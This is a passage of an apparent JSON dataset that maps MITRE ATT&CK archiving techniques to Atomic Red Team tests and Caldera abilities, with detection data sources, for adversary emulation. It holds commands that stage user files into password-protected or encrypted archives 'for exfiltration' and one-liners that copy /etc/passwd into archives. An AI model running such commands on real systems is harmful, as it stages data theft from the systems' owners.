.\\encrypted_file.txt\n\"#{7zip_exe}\" u archive.7z *txt -pblue\ndir\n", + "mkdir $PathToAtomicsFolder\\T1560.001\\victim-files\ncd $PathToAtomicsFolder\\T1560.001\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"%ProgramFiles%\\7-zip\\7z.exe\" u archive.7z *txt -pblue\ndir\n", + "zip #{output_file} /var/log/{w,b}tmp\n", + "zip $HOME/data.zip #{input_files}\n", + "test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo '#{input_content}' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)\n", + "test -e #{input_file} && gzip -k #{input_file} || (echo 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' >> #{input_file}; gzip -k #{input_file})\n", + "tar -cvzf #{output_file} $HOME/$USERNAME\n", + "tar -cvzf $HOME/data.tar.gz #{input_file_folder}\n", + "mkdir -p /tmp/T1560\ncd /tmp/T1560; touch a b c d e f g\nzip --password \"#{encryption_password}\" /tmp/T1560/#{test_file} ./*\necho \"#{encryption_password}\" | gpg --batch --yes --passphrase-fd 0 --output /tmp/T1560/#{test_file}.zip.gpg -c /tmp/T1560/#{test_file}.zip\nls -l /tmp/T1560\n", + "mkdir -p #{test_folder}\ncd #{test_folder}; touch a b c d e f g\nzip --password \"#{encryption_password}\" #{test_folder}/T1560 ./*\necho \"#{encryption_password}\" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/T1560.zip.gpg -c #{test_folder}/T1560.zip\nls -l #{test_folder}\n", + "mkdir -p #{test_folder}\ncd #{test_folder}; touch a b c d e f g\nzip --password \"InsertPasswordHere\" #{test_folder}/#{test_file} ./*\necho \"InsertPasswordHere\" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip\nls -l #{test_folder}\n", + "tar -C #{host.dir.staged} -czf - . 
| gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg\n", + "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" \"-p#{host.archive.password}\" | Out-Null;\nsleep 1; ls #{host.dir.staged}.7z | foreach {$_.FullName} | select\n", + "tar -czf #{host.dir.git}.tar.gz -C \"#{host.dir.git}\" .; printf #{host.dir.git}.tar.gz;\n", + "tar -czf #{host.dir.git}.tar.gz -C #{host.dir.git} *; Write-Host #{host.dir.git}.tar.gz; exit 0;\n", + "tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz\n", + "Compress-Archive -Path #{host.dir.staged} -DestinationPath #{host.dir.staged}.zip -Force;\nsleep 1; ls #{host.dir.staged}.zip | foreach {$_.FullName} | select\n" + ], + "commands": [ + { + "command": "\"#{rar_exe}\" a -r #{output_file} %USERPROFILE%\\*#{file_extension}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "\"#{rar_exe}\" a -r #{output_file} #{input_path}\\*.txt\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "\"#{rar_exe}\" a -r %USERPROFILE%\\T1560.001-data.rar #{input_path}\\*#{file_extension}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "\"#{rar_exe}\" a -r #{output_file} #{input_path}\\*#{file_extension}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "\"%programfiles%/WinRAR/Rar.exe\" a -r #{output_file} #{input_path}\\*#{file_extension}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": 
"mkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{rar_exe}\" a -hp\"blue\" hello.rar\ndir\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "mkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"%programfiles%/WinRAR/Rar.exe\" a -hp\"blue\" hello.rar\ndir\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "path=%path%;\"C:\\Program Files (x86)\\winzip\"\nmkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"%ProgramFiles%\\WinZip\\winzip64.exe\" -min -a -s\"hello\" archive.zip *\ndir\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "path=%path%;\"C:\\Program Files (x86)\\winzip\"\nmkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{winzip_exe}\" -min -a -s\"hello\" archive.zip *\ndir\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "mkdir $PathToAtomicsFolder\\T1560.001\\victim-files\ncd $PathToAtomicsFolder\\T1560.001\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{7zip_exe}\" u archive.7z *txt -pblue\ndir\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "mkdir $PathToAtomicsFolder\\T1560.001\\victim-files\ncd $PathToAtomicsFolder\\T1560.001\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"%ProgramFiles%\\7-zip\\7z.exe\" u archive.7z 
*txt -pblue\ndir\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "zip #{output_file} /var/log/{w,b}tmp\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "zip $HOME/data.zip #{input_files}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo '#{input_content}' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "test -e #{input_file} && gzip -k #{input_file} || (echo 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' >> #{input_file}; gzip -k #{input_file})\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "tar -cvzf #{output_file} $HOME/$USERNAME\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "tar -cvzf $HOME/data.tar.gz #{input_file_folder}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "mkdir -p /tmp/T1560\ncd /tmp/T1560; touch a b c d e f g\nzip --password \"#{encryption_password}\" /tmp/T1560/#{test_file} ./*\necho \"#{encryption_password}\" | gpg --batch --yes --passphrase-fd 0 --output /tmp/T1560/#{test_file}.zip.gpg -c /tmp/T1560/#{test_file}.zip\nls -l /tmp/T1560\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + 
"command": "mkdir -p #{test_folder}\ncd #{test_folder}; touch a b c d e f g\nzip --password \"#{encryption_password}\" #{test_folder}/T1560 ./*\necho \"#{encryption_password}\" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/T1560.zip.gpg -c #{test_folder}/T1560.zip\nls -l #{test_folder}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "mkdir -p #{test_folder}\ncd #{test_folder}; touch a b c d e f g\nzip --password \"InsertPasswordHere\" #{test_folder}/#{test_file} ./*\necho \"InsertPasswordHere\" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip\nls -l #{test_folder}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg\n", + "source": "data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml", + "name": "This ability packages staged files into a password-protected archive. Note - Requires 7Z for Windows and GPG version 2.1+ for Linux" + }, + { + "command": "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" \"-p#{host.archive.password}\" | Out-Null;\nsleep 1; ls #{host.dir.staged}.7z | foreach {$_.FullName} | select\n", + "source": "data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml", + "name": "This ability packages staged files into a password-protected archive. 
Note - Requires 7Z for Windows and GPG version 2.1+ for Linux" + }, + { + "command": "tar -czf #{host.dir.git}.tar.gz -C \"#{host.dir.git}\" .; printf #{host.dir.git}.tar.gz;\n", + "source": "data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml", + "name": "This ability will compress a given git repository." + }, + { + "command": "tar -czf #{host.dir.git}.tar.gz -C #{host.dir.git} *; Write-Host #{host.dir.git}.tar.gz; exit 0;\n", + "source": "data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml", + "name": "This ability will compress a given git repository." + }, + { + "command": "tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz\n", + "source": "data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml", + "name": "Compress a directory on the file system" + }, + { + "command": "Compress-Archive -Path #{host.dir.staged} -DestinationPath #{host.dir.staged}.zip -Force;\nsleep 1; ls #{host.dir.staged}.zip | foreach {$_.FullName} | select\n", + "source": "data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml", + "name": "Compress a directory on the file system" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1560.001", + "display_name": "Archive Collected Data: Archive via Utility", + "atomic_tests": [ + { + "name": "Compress Data for Exfiltration With Rar", + "auto_generated_guid": "02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration.\nWhen the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_path": { + "description": "Path that should be compressed into our output file", + "type": "Path", + "default": "%USERPROFILE%" + }, + "file_extension": { + "description": "Extension 
of files to compress", + "type": "String", + "default": ".txt" + }, + "output_file": { + "description": "Path where resulting compressed data should be placed", + "type": "Path", + "default": "%USERPROFILE%\\T1560.001-data.rar" + }, + "rar_installer": { + "description": "Winrar installer", + "type": "Path", + "default": "%TEMP%\\winrar.exe" + }, + "rar_exe": { + "description": "The RAR executable from Winrar", + "type": "Path", + "default": "%programfiles%/WinRAR/Rar.exe" + } + }, + "dependencies": [ + { + "description": "Rar tool must be installed at specified location (#{rar_exe})\n", + "prereq_command": "if not exist \"#{rar_exe}\" (exit /b 1)\n", + "get_prereq_command": "echo Downloading Winrar installer\nbitsadmin /transfer myDownloadJob /download /priority normal \"https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe\" #{rar_installer}\n#{rar_installer} /S\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "\"#{rar_exe}\" a -r #{output_file} #{input_path}\\*#{file_extension}\n", + "cleanup_command": "del /f /q /s #{output_file} >nul 2>&1\n" + } + }, + { + "name": "Compress Data and lock with password for Exfiltration with winrar", + "auto_generated_guid": "8dd61a55-44c6-43cc-af0c-8bdda276860c", + "description": "Note: Requires winrar installation\nrar a -p\"blue\" hello.rar (VARIANT)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "rar_installer": { + "description": "Winrar installer", + "type": "Path", + "default": "%TEMP%\\winrar.exe" + }, + "rar_exe": { + "description": "The RAR executable from Winrar", + "type": "Path", + "default": "%programfiles%/WinRAR/Rar.exe" + } + }, + "dependencies": [ + { + "description": "Rar tool must be installed at specified location (#{rar_exe})\n", + "prereq_command": "if not exist \"#{rar_exe}\" (exit /b 1)\n", + "get_prereq_command": "echo Downloading Winrar installer\nbitsadmin /transfer myDownloadJob /download /priority 
normal \"https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe\" #{rar_installer}\n#{rar_installer} /S\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "mkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{rar_exe}\" a -hp\"blue\" hello.rar\ndir\n" + } + }, + { + "name": "Compress Data and lock with password for Exfiltration with winzip", + "auto_generated_guid": "01df0353-d531-408d-a0c5-3161bf822134", + "description": "Note: Requires winzip installation\nwzzip sample.zip -s\"blueblue\" *.txt (VARIANT)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "winzip_exe": { + "description": "Path to installed Winzip executable", + "type": "Path", + "default": "%ProgramFiles%\\WinZip\\winzip64.exe" + }, + "winzip_url": { + "description": "Path to download Windows Credential Editor zip file", + "type": "Url", + "default": "https://download.winzip.com/gl/nkln/winzip24-home.exe" + }, + "winzip_hash": { + "description": "File hash of the Windows Credential Editor zip file", + "type": "String", + "default": "B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Winzip must be installed\n", + "prereq_command": "cmd /c 'if not exist \"#{winzip_exe}\" (echo 1) else (echo 0)'\n", + "get_prereq_command": "if(Invoke-WebRequestVerifyHash \"#{winzip_url}\" \"$env:Temp\\winzip.exe\" #{winzip_hash}){\n Write-Host Follow the installation prompts to continue\n cmd /c \"$env:Temp\\winzip.exe\"\n}\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "path=%path%;\"C:\\Program Files (x86)\\winzip\"\nmkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{winzip_exe}\" -min -a -s\"hello\" archive.zip *\ndir\n" + } + }, 
+ { + "name": "Compress Data and lock with password for Exfiltration with 7zip", + "auto_generated_guid": "d1334303-59cb-4a03-8313-b3e24d02c198", + "description": "Note: Requires 7zip installation\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "7zip_installer": { + "description": "7zip installer", + "type": "Path", + "default": "%TEMP%\\7zip.exe" + }, + "7zip_exe": { + "description": "Path to installed 7zip executable", + "type": "Path", + "default": "%ProgramFiles%\\7-zip\\7z.exe" + } + }, + "dependencies": [ + { + "description": "7zip tool must be installed at specified location (#{7zip_exe})\n", + "prereq_command": "if not exist \"#{7zip_exe}\" (exit /b 1)\n", + "get_prereq_command": "echo Downloading 7-zip installer\nbitsadmin /transfer myDownloadJob /download /priority normal \"https://www.7-zip.org/a/7z2002-x64.exe\" #{7zip_installer}\n#{7zip_installer} /S\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "mkdir $PathToAtomicsFolder\\T1560.001\\victim-files\ncd $PathToAtomicsFolder\\T1560.001\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{7zip_exe}\" u archive.7z *txt -pblue\ndir\n" + } + }, + { + "name": "Data Compressed - nix - zip", + "auto_generated_guid": "c51cec55-28dd-4ad2-9461-1eacbc82c3a0", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. 
This test uses standard zip compression.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "input_files": { + "description": "Path that should be compressed into our output file, may include wildcards", + "type": "Path", + "default": "/var/log/{w,b}tmp" + }, + "output_file": { + "description": "Path that should be output as a zip archive", + "type": "Path", + "default": "$HOME/data.zip" + } + }, + "dependencies": [ + { + "description": "Files to zip must exist (#{input_files})\n", + "prereq_command": "if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install epel-release zip)||(which apt-get && apt-get install -y zip)\necho Please set input_files argument to include files that exist\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "zip #{output_file} #{input_files}\n", + "cleanup_command": "rm -f #{output_file}\n" + } + }, + { + "name": "Data Compressed - nix - gzip Single File", + "auto_generated_guid": "cde3c2af-3485-49eb-9c1f-0ed60e9cc0af", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "input_file": { + "description": "Path that should be compressed", + "type": "Path", + "default": "$HOME/victim-gzip.txt" + }, + "input_content": { + "description": "contents of compressed files if file does not already exist. default contains test credit card and social security number", + "type": "String", + "default": "confidential! 
SSN: 078-05-1120 - CCN: 4000 1234 5678 9101" + } + }, + "executor": { + "name": "sh", + "elevation_required": false, + "command": "test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file})\n", + "cleanup_command": "rm -f #{input_file}.gz\n" + } + }, + { + "name": "Data Compressed - nix - tar Folder or File", + "auto_generated_guid": "7af2b51e-ad1c-498c-aca8-d3290c19535a", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "input_file_folder": { + "description": "Path that should be compressed", + "type": "Path", + "default": "$HOME/$USERNAME" + }, + "output_file": { + "description": "File that should be output", + "type": "Path", + "default": "$HOME/data.tar.gz" + } + }, + "dependencies": [ + { + "description": "Folder to zip must exist (#{input_file_folder})\n", + "prereq_command": "test -e #{input_file_folder}\n", + "get_prereq_command": "echo Please set input_file_folder argument to a folder that exists\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "tar -cvzf #{output_file} #{input_file_folder}\n", + "cleanup_command": "rm -f #{output_file}\n" + } + }, + { + "name": "Data Encrypted with zip and gpg symmetric", + "auto_generated_guid": "0286eb44-e7ce-41a0-b109-3da516e05a5f", + "description": "Encrypt data for exiltration\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "test_folder": { + "description": "Path used to store files.", + "type": "Path", + "default": "/tmp/T1560" + }, + "test_file": { + "description": "Temp file used to store encrypted data.", + "type": "Path", + "default": "T1560" + }, + "encryption_password": { + "description": "Password used to encrypt data.", + "type": "String", + "default": "InsertPasswordHere" + } + }, + 
"dependency_executor_name": "sh", + "dependencies": [ + { + "description": "gpg and zip are required to run the test.", + "prereq_command": "if [ ! -x \"$(command -v gpg)\" ] || [ ! -x \"$(command -v zip)\" ]; then exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "mkdir -p #{test_folder}\ncd #{test_folder}; touch a b c d e f g\nzip --password \"#{encryption_password}\" #{test_folder}/#{test_file} ./*\necho \"#{encryption_password}\" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip\nls -l #{test_folder}\n", + "cleanup_command": "rm -Rf #{test_folder}\n" + } + } + ] + }, + { + "id": "30a8cf10-73dc-497c-8261-a64cc9e91505", + "name": "Compress staged directory (Password Protected)", + "description": "This ability packages staged files into a password-protected archive. Note - Requires 7Z for Windows and GPG version 2.1+ for Linux", + "tactic": "collection", + "technique": { + "attack_id": "T1560.001", + "name": "Archive Collected Data: Archive via Utility" + }, + "platforms": { + "linux": { + "sh": { + "command": "tar -C #{host.dir.staged} -czf - . 
| gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg\n", + "cleanup": "rm #{host.dir.staged}.tar.gz.gpg\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + }, + "windows": { + "psh": { + "command": "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" \"-p#{host.archive.password}\" | Out-Null;\nsleep 1; ls #{host.dir.staged}.7z | foreach {$_.FullName} | select\n", + "cleanup": "rm #{host.dir.staged}.7z\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.staged" + } + ] + } + ] + }, + { + "id": "2f90d4de-2612-4468-9251-b220e3727452", + "name": "Compress Git Repository", + "description": "This ability will compress a given git repository.", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1560.001", + "name": "Archive Collected Data: Archive via Utility" + }, + "platforms": { + "linux": { + "sh": { + "command": "tar -czf #{host.dir.git}.tar.gz -C \"#{host.dir.git}\" .; printf #{host.dir.git}.tar.gz;\n", + "cleanup": "rm #{host.dir.git}.tar.gz;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + }, + "windows": { + "psh": { + "command": "tar -czf #{host.dir.git}.tar.gz -C #{host.dir.git} *; Write-Host #{host.dir.git}.tar.gz; exit 0;\n", + "cleanup": "Remove-Item -Path #{host.dir.git}.tar.gz;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + } + } + }, + { + "id": "300157e5-f4ad-4569-b533-9d1fa0e74d74", + "name": "Compress staged directory", + "description": "Compress a directory on the file system", + "tactic": "exfiltration", + "technique": { + "attack_id": 
"T1560.001", + "name": "Archive Collected Data: Archive via Utility" + }, + "platforms": { + "darwin": { + "sh": { + "command": "tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz\n", + "cleanup": "rm #{host.dir.staged}.tar.gz\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz\n", + "cleanup": "rm #{host.dir.staged}.tar.gz\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + }, + "windows": { + "psh,pwsh": { + "command": "Compress-Archive -Path #{host.dir.staged} -DestinationPath #{host.dir.staged}.zip -Force;\nsleep 1; ls #{host.dir.staged}.zip | foreach {$_.FullName} | select\n", + "cleanup": "rm #{host.dir.staged}.zip\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.staged" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was 
created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1560.002", + "command_list": [ + "$which_python -c \"import gzip;input_file=open('/etc/passwd', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('#{path_to_output_file}','wb','compresslevel=6');output_file.write(content);output_file.close();\"\n", + "$which_python -c \"import gzip;input_file=open('#{path_to_input_file}', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('/tmp/passwd.gz','wb','compresslevel=6');output_file.write(content);output_file.close();\"\n", + "$which_python -c \"import bz2;input_file=open('/etc/passwd','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('#{path_to_output_file}','w+');output_file.write(bz2content);output_file.close();\"\n", + "$which_python -c \"import 
bz2;input_file=open('#{path_to_input_file}','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('/tmp/passwd.bz2','w+');output_file.write(bz2content);output_file.close();\"\n", + "$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('/etc/passwd')\"\n", + "$which_python -c \"from zipfile import ZipFile; ZipFile('/tmp/passwd.zip', mode='w').write('#{path_to_input_file}')\"\n", + "$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('/etc/passwd')\" \n", + "$which_python -c \"from zipfile import ZipFile; ZipFile('/tmp/passwd.tar.gz', mode='w').write('#{path_to_input_file}')\" \n" + ], + "commands": [ + { + "command": "$which_python -c \"import gzip;input_file=open('/etc/passwd', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('#{path_to_output_file}','wb','compresslevel=6');output_file.write(content);output_file.close();\"\n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c \"import gzip;input_file=open('#{path_to_input_file}', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('/tmp/passwd.gz','wb','compresslevel=6');output_file.write(content);output_file.close();\"\n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c \"import bz2;input_file=open('/etc/passwd','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('#{path_to_output_file}','w+');output_file.write(bz2content);output_file.close();\"\n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c 
